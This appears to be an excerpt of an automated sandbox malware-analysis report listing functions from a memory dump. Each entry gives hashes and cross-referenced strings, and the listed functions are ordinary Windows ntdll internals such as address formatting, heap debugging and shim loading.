API String ID:
Opcode ID: 3ef590ae09fe1e354a347b48fb9576eab46158cb1df3827ceb8ce884ee2bc86b
Instruction ID: f6b6f3347f1b55514837804faa9cf2f029799475d8b8f26f22fa4d6f9330900a
Opcode Fuzzy Hash: 3ef590ae09fe1e354a347b48fb9576eab46158cb1df3827ceb8ce884ee2bc86b
Instruction Fuzzy Hash: 1790026138150442D10071584458B56005587E1311F99C025E1064514DC61DCD527126

Function 22562FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4a36f9a707b2f97752a7da61144b1279178d9b4370fa3df86c554a5c4518db
Instruction ID: 4d12abd75127dde2e4b0cda57082d0a11b5cffd20e1fca2ce0eae552bfb92dd8
Opcode Fuzzy Hash: fc4a36f9a707b2f97752a7da61144b1279178d9b4370fa3df86c554a5c4518db
Instruction Fuzzy Hash: E0900221251D0042D20075684C58B57005547D0313F99C125A0154514CC91989616521

Function 22562F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccec033304165c753201864acddf65681e84bb87d567df3ccf88928d167c058d
Instruction ID: 8153511dce6a3e31af2da278877a0c3c92a79515e3d38d8367026344d0803254
Opcode Fuzzy Hash: ccec033304165c753201864acddf65681e84bb87d567df3ccf88928d167c058d
Instruction Fuzzy Hash: E890023124190402D1007158485875B005547D0312F99C021A1164515DC62989517571

Function 22562FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281e81409df181c886fbacd1dd95509d0accd176382248d1e53fa6f195df0168
Instruction ID: 2cb78f9e7ce4b73981439722bc0cea56b07eba5ad898de6dde04156105e84759
Opcode Fuzzy Hash: 281e81409df181c886fbacd1dd95509d0accd176382248d1e53fa6f195df0168
Instruction Fuzzy Hash: 799002216415004241407168888895640556BE1221799C131A0998510DC55D89656665

Function 22562FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23acec8ea51fd62eba8a2a0ae869c1f09c7b653a638e650ed2e7f8c000798857
Instruction ID: a1925d967af7f043b3a6b38c0fd1e6d86e216ff8d213d6d655f79f27f2d98958
Opcode Fuzzy Hash: 23acec8ea51fd62eba8a2a0ae869c1f09c7b653a638e650ed2e7f8c000798857
Instruction Fuzzy Hash: 5E90023124190402D1007158484C797005547D0312F99C021A5164515EC669C9917531

Function 22562C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d45ec4df73feec07c3cba57ce49c51abecbaf5d75e83e9f1d1204d75681a58
Instruction ID: 36b8d1cfe03d70383df09440470d86ac3913f176871b2ba19d494bb7eb67f4f3
Opcode Fuzzy Hash: b0d45ec4df73feec07c3cba57ce49c51abecbaf5d75e83e9f1d1204d75681a58
Instruction Fuzzy Hash: 4F90023124150842D10071584448B96005547E0311F99C026A0124614DC619C9517521

Function 22562CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534c062bf2fddb535f4cc4d4514ab7a57ca2b516ecde26fea983ad2efbd59e86
Instruction ID: a7a46a3e8beba5b48d1e82eb7c96bbe9b6bec6a14ec2aec5cbf13db2daadbe6b
Opcode Fuzzy Hash: 534c062bf2fddb535f4cc4d4514ab7a57ca2b516ecde26fea983ad2efbd59e86
Instruction Fuzzy Hash: 6290022164550402D1407158545C756006547D0211F99D021A0024514DC65D8B5576A1

Function 22562CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adcc64a11c682656a811d82d1148ceca4de82503312ae4d1b82780240c18f46a
Instruction ID: 13c0afbfde065c711094a482c7ca53c92a1749aede1235df950b91e131092ac5
Opcode Fuzzy Hash: adcc64a11c682656a811d82d1148ceca4de82503312ae4d1b82780240c18f46a
Instruction Fuzzy Hash: 0E90043134150403D100715C554C757005547D0311FDDD431F043451CDD75FCD517131

Function 22562CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e00b5cc6482c827d95ccdf2cd2b44c8cacde1d06428123b74f564a365bacc5
Instruction ID: 01b946f98e2891c271731ce59979e6de0b82ea24f1193e9789ee918f71eb0635
Opcode Fuzzy Hash: c9e00b5cc6482c827d95ccdf2cd2b44c8cacde1d06428123b74f564a365bacc5
Instruction Fuzzy Hash: FD90023124150402D1007598544C696005547E0311F99D021A5024515EC66989917131

Function 22562D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9cdd7cb5267c46adf83a7c5ef35d2de35fe25205c920f3938d13d129fef9d0b
Instruction ID: f00987137b372187bc8f1c2dadb78f8461cc077ff54b25fe408ce0679534befc
Opcode Fuzzy Hash: c9cdd7cb5267c46adf83a7c5ef35d2de35fe25205c920f3938d13d129fef9d0b
Instruction Fuzzy Hash: 3E90022925350002D1807158544C65A005547D1212FD9D425A0015518CC91989696321

Function 22562D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c15eaf8624fbb33b340081ad5dd47931d8bbdeecc6aae967413f593f122723
Instruction ID: d0fba6ba41efc585fc3578d04ef8fe1dd7c28237b71f186d09384e463ee8147d
Opcode Fuzzy Hash: d8c15eaf8624fbb33b340081ad5dd47931d8bbdeecc6aae967413f593f122723
Instruction Fuzzy Hash: AD90043134554443D100755C544CF57005547D0315FDDD031F1074555DC73DCD51F131

Function 22562D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3339ed593a4b4d7f394abd37cc8e769dd523ec6893d85cfac948c41919910b0
Instruction ID: a4f02140a2a04cd5327a044c041bbde2136264d327e5f433ad8c15b63f81fd17
Opcode Fuzzy Hash: e3339ed593a4b4d7f394abd37cc8e769dd523ec6893d85cfac948c41919910b0
Instruction Fuzzy Hash: B290022134150003D1407158545C656405597E1311F99D021E0414514CD91989566222

Function 22562DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92eb18c63ea995b1451a189eec688aab5ca0bb0b387e40eb406ec43b285e727d
Instruction ID: 967d9fc104f66e516261a1ea3617272dcca53ee6db4c32a404c4e9f5e1997bdf
Opcode Fuzzy Hash: 92eb18c63ea995b1451a189eec688aab5ca0bb0b387e40eb406ec43b285e727d
Instruction Fuzzy Hash: F6900221282541525545B1584448557405657E02517D9C022A1414910CC52A9956E621

Function 22562DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5095249b8a2e2e547bd44427e908bc8d2f5a69480060a04d791961a6123619c
Instruction ID: 014a850b54d49bcb18f241e80cf8c8a6ce15f5ffe7f54168d3e318e9aa1dbc60
Opcode Fuzzy Hash: e5095249b8a2e2e547bd44427e908bc8d2f5a69480060a04d791961a6123619c
Instruction Fuzzy Hash: 4290023128150402D14171584448656005957D0251FD9C022A0424514EC6598B56BA61

Function 22563010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0943edfe7c6715d5a3d9c62cb887c514fdd2d6f2c1aa8ce9cf5ab0cb35da503c
Instruction ID: ecc69c04d3f2764991cfd49a8af42e4746e88f45447384a2d8b4d82624d7e347
Opcode Fuzzy Hash: 0943edfe7c6715d5a3d9c62cb887c514fdd2d6f2c1aa8ce9cf5ab0cb35da503c
Instruction Fuzzy Hash: C590022124194442D14072584848B5F415547E1212FD9C029A4156514CC91989556721

Function 22563090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a406494d19670e511e19c4e77ae1e9e6bb67968a31e82c65fe340338e606897
Instruction ID: f40233eaece7487952ed339a93c45fd49a6b220522d200c50fd28df2d923d3b6
Opcode Fuzzy Hash: 8a406494d19670e511e19c4e77ae1e9e6bb67968a31e82c65fe340338e606897
Instruction Fuzzy Hash: 7190022128150802D14071588458757005687D0611F99C021A0024514DC61A8A6576B1

Function 22562C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 9602da95641051843c28c29646a88f8be0f98eefdebbbd1563e6f16cd39cef0c
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 22562890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 2256293C
___swprintf_l.LIBCMT ref: 2256295E
___swprintf_l.LIBCMT ref: 225629A3
___swprintf_l.LIBCMT ref: 2259A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 2259A54E
ffff:, xrefs: 2259A504
:%u.%u.%u.%u, xrefs: 2259A5B8
::%hs%u.%u.%u.%u, xrefs: 2259A527

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 18854db1bb5f95ea831490b6364bf035175a05ca2d3b25afe3042e759bcdb23a
Instruction ID: e62d2899f7750fc307d8ffc8f2d2165a0bcf1d3ae3aca25eba6cf8a1e75fdc4a
Opcode Fuzzy Hash: 18854db1bb5f95ea831490b6364bf035175a05ca2d3b25afe3042e759bcdb23a
Instruction Fuzzy Hash: 4051B7B6A00316BFDB10DBA8CD90A7EFBB8BB98205750C669E454D7645E274DF40CBE0

Function 225D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 225D24A6
___swprintf_l.LIBCMT ref: 225D24E2
___swprintf_l.LIBCMT ref: 225D257D
___swprintf_l.LIBCMT ref: 225D25A3
___swprintf_l.LIBCMT ref: 225D25C8
___swprintf_l.LIBCMT ref: 225D2608

Strings

::%hs%u.%u.%u.%u, xrefs: 225D249E
:%u.%u.%u.%u, xrefs: 225D25FF
ffff:, xrefs: 225D247D, 225D249D
::ffff:0:%u.%u.%u.%u, xrefs: 225D24DA

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 6881d7c2a204935d963d09cc16bcb4cf101bc1f6f682c45403077a41468971b0
Instruction ID: 057e444034c204a6fcaab938fd51dc3019883ef981d4b1fc0d2cba220a1985d5
Opcode Fuzzy Hash: 6881d7c2a204935d963d09cc16bcb4cf101bc1f6f682c45403077a41468971b0
Instruction Fuzzy Hash: 4451B576A00745AEDB20CF9CCAA0D7FBBF9EF44204B50C859E595DB642E6B4EE40C760

Function 225FA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 225FA6DD
RtlDebugPrintTimes.NTDLL ref: 225FA771
RtlDebugPrintTimes.NTDLL ref: 225FA794
RtlDebugPrintTimes.NTDLL ref: 225FA7C0
RtlDebugPrintTimes.NTDLL ref: 225FA895
RtlDebugPrintTimes.NTDLL ref: 225FA8E8
RtlDebugPrintTimes.NTDLL ref: 225FA907
RtlDebugPrintTimes.NTDLL ref: 225FA938

Strings

HEAP: , xrefs: 225FA686

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: aa16046d4be69c4df8cceafcb4e903bfa9f1bb8fd27b94cf32946c48a854ad0a
Instruction ID: 0771adc87c0644cbeeec3ce3e430f7721f7c8485405f411346dbd30d22548e8a
Opcode Fuzzy Hash: aa16046d4be69c4df8cceafcb4e903bfa9f1bb8fd27b94cf32946c48a854ad0a
Instruction Fuzzy Hash: F6A1AE716053018FC705CE18C990A1ABBE6FF89324F14896DF945DB321E778ED41CB92

Function 22557630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ExecuteOptions, xrefs: 225946A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 22594787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22594742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 225946FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22594655
Execute=1, xrefs: 22594713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22594725

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: cd6d92b09d9735faa058a22c57774694940267812a72e39ad9f5345f40fe6c8f
Instruction ID: 5dfbba488aefd7374f997db8665d02605efd5a29bf9209f01aacd08b7d5dd705
Opcode Fuzzy Hash: cd6d92b09d9735faa058a22c57774694940267812a72e39ad9f5345f40fe6c8f
Instruction Fuzzy Hash: 94513931600319ABEB209BA4DD95FEE77F8EF58304F00859AE604AB191EB31EE51CF51

Function 2253A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 225879D0, 225879F5
SsHd, xrefs: 2253A3E4
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 225879FA
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 22587AE6
Actx , xrefs: 22587A0C, 22587A73
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 225879D5

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 7ba9ecbb670b7263bf176f062c169a5fc736d49af21b38b968ba7c849eb227b4
Instruction ID: 8b3980f78ceea3e6c6bd9fd294661fb78bcc1fcb9902ce1d69d14ddeba880506
Opcode Fuzzy Hash: 7ba9ecbb670b7263bf176f062c169a5fc736d49af21b38b968ba7c849eb227b4
Instruction Fuzzy Hash: 8EE1F5716043018FD712CF24C984B5ABBE5FB84368F109B2DF9A5CB291D779D985CB82

Function 225165B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22516664
RtlDebugPrintTimes.NTDLL ref: 225166AF

Strings

LdrpLoadShimEngine, xrefs: 22579ABB, 22579AFC
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 22579AB4
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 22579AF6
minkernel\ntdll\ldrinit.c, xrefs: 22579AC5, 22579B06

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 212055b6ad8b221d1a8d38596aa9abb59e15cd3f7ae7b5c9f1435bbe3952a0b4
Instruction ID: e762a4f87f09742e370f5fe21ed5c719499cce5fee85bcc2f0ba481719be2342
Opcode Fuzzy Hash: 212055b6ad8b221d1a8d38596aa9abb59e15cd3f7ae7b5c9f1435bbe3952a0b4
Instruction Fuzzy Hash: C451F532B413589FDB14DB68CC94FAD7BB1BB94304F14851AE941AF299CB74EC80C790

Function 225CF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225CF250
RtlDebugPrintTimes.NTDLL ref: 225CF2C5

Strings

---------------------------------------, xrefs: 225CF279
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 225CF263
HEAP: , xrefs: 225CF15D
Entry Heap Size , xrefs: 225CF26D

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
